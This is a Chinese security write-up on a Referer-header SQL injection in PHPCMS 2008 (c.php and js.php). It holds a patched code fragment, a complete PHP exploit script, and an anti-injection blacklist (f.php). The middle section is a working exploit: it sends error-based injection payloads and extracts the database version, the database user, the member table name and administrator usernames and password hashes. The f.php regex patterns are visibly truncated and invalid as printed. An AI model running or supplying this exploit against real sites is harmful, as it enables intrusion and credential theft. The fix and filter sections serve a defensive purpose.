易想团购 注入 user.php,PHPCMS 2008 c.php存在referer sql注入及修复方案

b53c2b7149d1d0786e5b1ceeb1ee856a.png

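// Fragment of PHPCMS 2008 c.php (ad click logging) as quoted in the write-up; the
// file's opening <?php and anything before the first require are not shown here.
require './ads/include/common.inc.php';

require 'f.php'; // request blacklist added by the write-up's author (the f.php listing further down)

// The only GET input: intval() makes it safe to concatenate into SQL below.
$id = intval($id);

$ads = $c_ads->get_info($id);

if($ads)
{
    // adsid is read back from the row selected by the integer id above.
    $db->query("UPDATE ".DB_PRE."ads SET `clicks`=clicks+1 WHERE adsid=".$ads['adsid']);

    $info['username'] = $_username;
    $info['clicktime'] = time();
    $info['ip'] = IP;
    $info['adsid'] = $id;

    // Injection point of the write-up: the Referer header is attacker-controlled and
    // went into $db->insert() untouched. Quote-escape it here and cap its length so
    // it cannot close the INSERT's string literal.
    // Caveat: addslashes() is a stop-gap that only holds when the connection charset
    // is not a GBK-style multibyte one; the durable fix is escaping or parameter
    // binding inside $db->insert(), which lives outside this file. The 255 cap is a
    // guess at the column width — adjust to the real schema.
    // HTTP_REFERER is presumably a constant defined by common.inc.php — verify.
    $referer = defined('HTTP_REFERER') ? (string) HTTP_REFERER : '';
    $info['referer'] = addslashes(substr($referer, 0, 255));

    // Click log is split per month (ads_YYMM); create the month's table on first use.
    $year = date('ym',TIME);
    $table = DB_PRE.'ads_'.$year;
    $table_status = $db->table_status($table);
    if(!$table_status) {
        include MOD_ROOT.'include/create.table.php';
    }

    $db->insert($table, $info);

    // Redirect target comes from the ad row; the redirect itself is outside this fragment.
    $url = strpos($ads['linkurl'], 'http://')===FALSE ? 'http://'.$ads['linkurl'] : $ads['linkurl'];
}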

?>

*********************************渗透代码 EXP（PHPCMS 2008 c.php / js.php 注入利用脚本）**********************************************

/**

* Created BY 独自等待

* Date : 13-5-29

* Time : 下午2:40

* FileName : phpcms2008_c.php

* 欢迎访问独自等待博客www.waitalone.cn

*/

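// Banner. Target: the unescaped Referer header that PHPCMS 2008's c.php (and, per
// the write-up, data/js.php) writes into its click-log table — see the c.php fragment above.
print_r('

+------------------------------------------------------+

PHPCMS2008 c.php/js.php 注入EXP

Site:http://www.waitalone.cn/

Exploit BY: 独自等待

Time:2013-05-29

+------------------------------------------------------+

');

// Usage guard: host, path and type are all required ($argc counts the script name).
// The original example omitted the third argument and would itself have tripped
// this check; it now shows a valid invocation.
if ($argc < 4) {
    print_r('

+------------------------------------------------------+

Useage: php ' . $argv[0] . ' host path type

Host: target server (ip/hostname)

Path: path of phpcms

Type: type=1->c.php type=2->js.php

Example: php ' . $argv[0] . ' localhost /phpcms 1

+------------------------------------------------------+

');
    exit;
}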

// 7 == E_ERROR | E_WARNING | E_PARSE: notices (e.g. the undefined array index in
// get_info() when a payload leaks nothing) are silenced.
error_reporting(7);

// Wall-clock timer; the elapsed time is echoed at the very end of the script.
$start_time = func_time();

// Positional arguments: target host, PHPCMS install path, and page type (1 or 2).
$host = $argv[1];
$path = $argv[2];
$type = $argv[3];

// Pick which of the two pages the write-up names as affected to send the payload to.
switch ($type) {
    case 1:
        $url = '/c.php?id=1';
        break;
    case 2:
        $url = '/data/js.php?id=1';
        break;
    default:
        echo '请输入注入页面1或者2' . "\n";
        exit;
}

// Error-based extraction. Each payload closes the string literal the Referer lands
// in ('), wraps the wanted value between 0x7e ('~') markers inside the classic
// count(*) / group by floor(rand(0)*2) duplicate-key trick, and re-balances the
// statement with and '1'='1. MySQL's duplicate-entry error then carries "~value~1"
// back in the page and get_info() extracts it.

// database version
$cmd1 = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$db_ver = get_info($cmd1);

// database user
$cmd2 = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$db_user = get_info($cmd2);

// member table name, found by pattern so the table prefix need not be known
$cmd3 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() and table_name like '%_member%' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$member = get_info($cmd3);

// number of rows with groupid=1 (the write-up treats these as administrators)
// NOTE(review): $member is interpolated unquoted into this and the next payload; if
// cmd3 leaked nothing it is null and the FROM clause collapses to "FROM  where".
$cmd4 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,count(*),0x7e) FROM $member where groupid=1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
$ad_count = get_info($cmd4);

// The technique needs the target to print DB errors: a "\&;" Referer only yields
// "MySQL Query" in the response when it does. (The four queries above were already
// sent before this probe; moving the probe first would save requests on a clean target.)
if (preg_match('/MySQL Query/i', send_pack('\&;'))) {
    echo '数据库版本: ' . $db_ver . "\n";
    echo '数据库用户: ' . $db_user . "\n";
    echo '管理员个数: ' . $ad_count . "\n";

    // one request per admin row, paging with LIMIT $i,1
    // NOTE(review): if $ad_count is null (nothing leaked) range(0, -1) yields [0, -1]
    // and "LIMIT -1,1" is not valid SQL; a non-numeric string would be worse on PHP 8.
    foreach (range(0, ($ad_count - 1)) as $i) {
        $cmd5 = "' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x3a,password,0x7e) FROM $member where groupid=1 LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
        echo '管理员' . $i . '-->' . get_info($cmd5) . "\n";
    }
} else {
    exit("报告大人,网站不存在此漏洞,请更换注入页面试试!\n");
}

//发送数据包函数

/**
 * Send one GET for the chosen injection page with the payload in the Referer
 * header and return the raw HTTP response (status line, headers and body).
 *
 * Reads the globals set by the script prologue: $host (target), $path (PHPCMS
 * install path) and $url (page chosen by the type argument). Plain HTTP on port
 * 80 with a 10 s connect timeout; on connection failure the error is printed and
 * the script exits. A User-Agent header is deliberately not sent (the original
 * had a commented-out "Baiduspider" line).
 *
 * @param string $cmd value sent as the Referer header (the SQL payload)
 * @return string raw response
 */
function send_pack($cmd)
{
    global $host, $path, $url;

    $request = "GET " . $path . "$url HTTP/1.1\r\n"
        . "Host: $host\r\n"
        . "Referer: " . $cmd . "\r\n"
        . "Connection: Close\r\n\r\n";

    $sock = @fsockopen($host, 80, $errno, $errstr, 10);
    if (!$sock) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    }

    fwrite($sock, $request);
    // Read until the server closes the connection (Connection: Close above).
    $response = stream_get_contents($sock);
    fclose($sock);

    return $response;
}

//提取返回信息

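/**
 * Run one error-based payload and extract the leaked value.
 *
 * The payloads wrap the wanted value as ~value~ and MySQL's duplicate-entry error
 * echoes it back as "~value~1"; the regex picks the text between the tildes. The
 * response is fetched once and reused for the charset check — the original called
 * send_pack() twice per payload, doubling the requests against the target. When
 * the response carries no marker the function returns null, as the original did
 * through an undefined array index (callers rely on null, e.g. $ad_count - 1).
 *
 * @param string $info Referer payload
 * @return string|null leaked value, converted to GBK when the page declares utf-8
 */
function get_info($info)
{
    $response = send_pack($info);
    if (!preg_match('/~(.*)~1/i', $response, $m)) {
        return null;
    }
    if (preg_match('/charset=utf-8/i', $response)) {
        return iconv('utf-8', 'gbk//IGNORE', $m[1]);
    }
    return $m[1];
}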

//时间统计函数

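/**
 * Current Unix time as a float with microsecond precision; used to time the run.
 *
 * microtime(true) is the direct form of the original "msec sec" split-and-add and
 * avoids the string round trip.
 *
 * @return float seconds since the epoch
 */
function func_time()
{
    return microtime(true);
}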

// Wall-clock runtime of the whole run; $start_time was taken in the prologue.
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';

?>

*********************************f.php 防注入过滤代码（作者在 c.php 中 require 的 referer 防护，不是攻击代码）**********************************************

// The Referer is wrapped in a 0- or 1-element array so it can be run through the
// same per-parameter loop as $_GET/$_POST/$_COOKIE below. empty() also discards a
// literal "0" referer, which is harmless here.
$referer=empty($_SERVER['HTTP_REFERER']) ? array() : array($_SERVER['HTTP_REFERER']);

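/**
 * Error handler installed below: aborts the request on a PHP error.
 *
 * The original echoed the error number, the absolute file path and the line to the
 * client, which discloses the server's filesystem layout to whoever triggered the
 * error; those details now go to the server log and the client only gets a generic
 * message.
 *
 * @param int    $errno   PHP error level
 * @param string $errstr  error message
 * @param string $errfile file that raised it
 * @param int    $errline line that raised it
 * @return never
 */
function customError($errno, $errstr, $errfile, $errline)
{
    error_log("Error number: [$errno] $errstr, error on line $errline in $errfile");
    echo "An internal error occurred.";
    die();
}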

// NOTE(review): user handlers registered with set_error_handler() are never invoked
// for E_ERROR (fatal errors cannot be handled from PHP code), so with this mask the
// handler above never runs. A mask such as E_WARNING | E_NOTICE would make it fire —
// at the cost of turning every warning into a dead request.
set_error_handler("customError",E_ERROR);

// NOTE(review): the three patterns below are cut off in this listing — each ends in
// the middle of an alternation ("(>|", "(=|>|") with no closing quote, and "]*?>"
// looks like the tail of a tag matcher whose "<[^" was eaten when the page was
// extracted. As printed they are not valid PHP; take the full strings from the
// original f.php. Whatever the full alternations are, StopAttack() wraps them in
// /…/is and uses them as a keyword blacklist: $_GET and the Referer are checked
// with $getfilter, $_POST with $postfilter, $_COOKIE with $cookiefilter. A
// blacklist like this is a mitigation, not a fix for the injection in c.php.
$getfilter="'|\b(alert|confirm|prompt)\b|]*?>|^\\+\/v(8|9)|\\b(and|or)\\b.+?(>|

$postfilter="^\\+\/v(8|9)|\\b(and|or)\\b.{1,6}?(=|>|

$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|

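/**
 * Blacklist check of one request parameter: prints a refusal and terminates the
 * request if the value (flattened, for nested arrays) or the parameter name
 * matches the given pattern; otherwise returns and the request continues.
 *
 * This is a keyword blacklist, not a fix for the injection — the real fix is
 * escaping/parameterising the Referer at the SQL sink in c.php. Even as a filter
 * the original failed open: preg_match() returns false on error (a malformed
 * pattern, or the PCRE backtrack limit on a long input against the lazy ".+?"
 * alternations under /is), and "false == 1" is false, so such a request went
 * through. Any non-zero result — match or error — now blocks.
 *
 * @param string|int $StrFiltKey   parameter name (also attacker-controlled)
 * @param mixed      $StrFiltValue parameter value, string or nested array
 * @param string     $ArrFiltReq   regex alternation, wrapped in /…/is here
 * @return void returns only when nothing matched
 */
function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){
    $flat_value = (string) arr_foreach($StrFiltValue);
    $pattern = "/".$ArrFiltReq."/is";
    // 1 = match, 0 = clean, false = PCRE error; only 0 lets the request through.
    if (preg_match($pattern, $flat_value) !== 0 || preg_match($pattern, (string) $StrFiltKey) !== 0) {
        print "


您的提交带有不合法参数,谢谢合作!
";
        exit();
    }
}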

// Every request source is checked parameter by parameter, each with the pattern
// meant for it: $_GET and the Referer share $getfilter, $_POST and $_COOKIE have
// their own. Sources are visited in the same order as before, so the first hit
// still wins.
$request_sources = array(
    array($_GET,    $getfilter),
    array($_POST,   $postfilter),
    array($_COOKIE, $cookiefilter),
    array($referer, $getfilter),
);
foreach ($request_sources as $source) {
    list($params, $pattern) = $source;
    foreach ($params as $param_name => $param_value) {
        StopAttack($param_name, $param_value, $pattern);
    }
}

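/**
 * Flatten a (possibly nested) request parameter into one string for matching.
 *
 * Scalars are returned unchanged; arrays are walked depth-first and their leaf
 * values concatenated with no separator, in iteration order. The original kept
 * the leaves in a `static` array, so every call after the first returned its own
 * leaves plus those of all earlier calls in the same request (and an all-empty
 * array ended in implode(null)); the accumulator is now per call.
 *
 * @param mixed $arr scalar or nested array
 * @return mixed the scalar itself, or the concatenated leaves of the array
 */
function arr_foreach($arr) {
    if (!is_array($arr)) {
        return $arr;
    }
    $leaves = array();
    // array_walk_recursive visits leaves depth-first, left to right — the same
    // order as the original recursion.
    array_walk_recursive($arr, function ($leaf) use (&$leaves) {
        $leaves[] = $leaf;
    });
    return implode('', $leaves);
}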

?>
